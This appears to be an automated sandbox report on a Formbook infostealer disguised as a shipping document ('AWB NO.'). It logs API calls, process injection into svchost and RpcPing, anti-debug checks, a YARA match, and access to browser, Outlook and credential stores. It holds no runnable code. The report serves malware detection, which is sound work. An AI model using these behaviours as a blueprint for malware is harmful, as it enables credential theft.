            Source: AWB NO. 077-57676135055.exe, 00000000.00000000.18119188502.00000000004B5000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_d05e85b2-d
            Source: AWB NO. 077-57676135055.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_5dce06c9-2
            Source: AWB NO. 077-57676135055.exe String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b5d8b72a-5
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042C223 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F734E0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72A80 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B90 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D10 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74260 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F74570 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AC0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72AA0 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72A10 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BE0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72BC0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B80 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B20 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B10 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72B00 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F738D0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F729F0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F729D0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72ED0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EC0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72EB0 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E80 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E50 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72E00 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72FB0 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F30 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72F00 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CF0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72CD0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73C90 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C50 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C30 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F73C30 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C20 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72C10 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DC0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72DA0 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F72D50 NtWriteVirtualMemory
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00464021: CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00458858 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF6C692_2_02FF6C69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFEC602_2_02FFEC60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEEC4C2_2_02FEEC4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4AC202_2_02F4AC20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30C122_2_02F30C12
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDFDF42_2_02FDFDF4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49DD02_2_02F49DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52DB02_2_02F52DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40D692_2_02F40D69
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D4C2_2_02FF7D4C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFD272_2_02FFFD27
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300ACEB2_2_0300ACEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3AD002_2_02F3AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87BE4 appears 87 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B910 appears 251 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBEF10 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75050 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAE692 appears 84 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00420D27 appears 70 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00428B40 appears 42 times
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: String function: 00407F41 appears 35 times
            Source: AWB NO. 077-57676135055.exe, 00000000.00000003.18132666268.00000000040DD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB NO. 077-57676135055.exe
            Source: AWB NO. 077-57676135055.exe, 00000000.00000003.18134277074.0000000003F33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs AWB NO. 077-57676135055.exe
            Source: AWB NO. 077-57676135055.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Matched rule: Windows_Trojan_Formbook_1112e116 (reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23), matched in:
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: classification engine; Classification label: mal100.troj.spyw.evad.winEXE@7/5@16/12
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046A2D5 GetLastError,FormatMessageW,0_2_0046A2D5
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458713 AdjustTokenPrivileges,CloseHandle,0_2_00458713
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00458CC3
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0046B59E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0047F121
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0046C602 CoInitialize,CoCreateInstance,CoUninitialize,0_2_0046C602
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00404FE9
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe; File created: C:\Users\user\AppData\Local\Temp\autF6BF.tmp
            Source: AWB NO. 077-57676135055.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe; File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RpcPing.exe, 00000004.00000003.19091477806.0000000007BEC000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.19091477806.0000000007BFA000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23189698242.0000000007BFA000.00000004.00000020.00020000.00000000.sdmp, 45570IH2.4.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
            Source: AWB NO. 077-57676135055.exe; ReversingLabs: Detection: 47%
            Source: unknownProcess created: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe; Sections loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, edgegdi.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exe; Sections loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe; Sections loaded: winhttp.dll, credui.dll, sspicli.dll, wininet.dll, edgegdi.dll, kernel.appcore.dll, uxtheme.dll, ieframe.dll, iertutil.dll, netapi32.dll, version.dll, userenv.dll, wkscli.dll, netutils.dll, windows.storage.dll, wldp.dll, profapi.dll, secur32.dll, mlang.dll, propsys.dll, winsqlite3.dll, vaultcli.dll, wintypes.dll, dpapi.dll, cryptbase.dll
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe; Sections loaded: wininet.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, fwpuclnt.dll, rasadhlp.dll
            Source: C:\Windows\SysWOW64\RpcPing.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\RpcPing.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: AWB NO. 077-57676135055.exeStatic file information: File size 1182720 > 1048576
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: AWB NO. 077-57676135055.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18449708265.000000000051E000.00000002.00000001.01000000.00000004.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23184750264.000000000051E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdbGCTL source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: AWB NO. 077-57676135055.exe, 00000000.00000003.18131573643.0000000003FB0000.00000004.00001000.00020000.00000000.sdmp, AWB NO. 077-57676135055.exe, 00000000.00000003.18129996314.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.18533534284.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18369078674.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.18533534284.000000000302D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18362303524.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.000000000343D000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23186772776.0000000003310000.00000040.00001000.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18532753430.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, RpcPing.exe, 00000004.00000003.18540137751.0000000003163000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: RPCPing.pdb source: svchost.exe, 00000002.00000003.18500957971.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.18501031361.000000000082B000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000003.22066027832.0000000000B9B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: RpcPing.exe, 00000004.00000002.23187811443.000000000393C000.00000004.10000000.00040000.00000000.sdmp, RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000000.18680544916.0000000002D7C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.19004125183.000000003A15C000.00000004.80000000.00040000.00000000.sdmp
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: AWB NO. 077-57676135055.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0047C304 LoadLibraryA,GetProcAddress,0_2_0047C304
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00428B85 push ecx; ret 0_2_00428B98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004190A0 push esp; ret 2_2_004190B5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00408926 push ebx; iretd 2_2_0040892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D99B pushad ; ret 2_2_0040D99C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EB96 push FFFFFF8Fh; retf 2_2_0041EB9A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CAC pushfd ; retf 2_2_00411CB8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00411CBF push 3E557F42h; ret 2_2_00411CC4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004075A7 push 67C9EEB0h; retf 2_2_004075B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F308CD push ecx; mov dword ptr [esp], ecx2_2_02F308D6
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00404A35
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_004855FD
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004233C7 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004233C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe; Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI/Special instruction interceptor: Address: 1033234
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D144
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D604
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D764
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D324
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D364
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D004
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0FF74
            Source: C:\Windows\SysWOW64\RpcPing.exeAPI/Special instruction interceptor: Address: 7FFF02D0D864
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F71763 rdtsc 2_2_02F71763
            Source: C:\Windows\SysWOW64\RpcPing.exe; Window / User API: threadDelayed 9113
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98907
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeAPI coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.9 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096; Thread sleep count: 115 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096; Thread sleep time: -230000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096; Thread sleep count: 9113 > 30
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 8096; Thread sleep time: -18226000s >= -30000s
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe TID: 504; Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe; Last function: Thread delayed
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00464696 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00464696
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046C93C FindFirstFileW,FindClose, 0_2_0046C93C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime, 0_2_0046C9C7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F200
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F35D
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046F65E FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_0046F65E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00463A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463A2B
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00463D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463D4E
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0046BF27 FindFirstFileW,FindNextFileW,FindClose, 0_2_0046BF27
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00404AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00404AFE
            Source: firefox.exe, 00000006.00000002.19005813498.0000016E3A017000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
            Source: RpcPing.exe, 00000004.00000002.23185093416.0000000002DD2000.00000004.00000020.00020000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23185419592.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe API call chain: ExitProcess graph end node graph_0-98308
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe API call chain: ExitProcess graph end node graph_0-97879
            Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RpcPing.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F71763 rdtsc 2_2_02F71763
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417CC3 LdrLoadDll, 2_2_00417CC3
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_004741FD BlockInput, 0_2_004741FD
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00403B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00403B4C
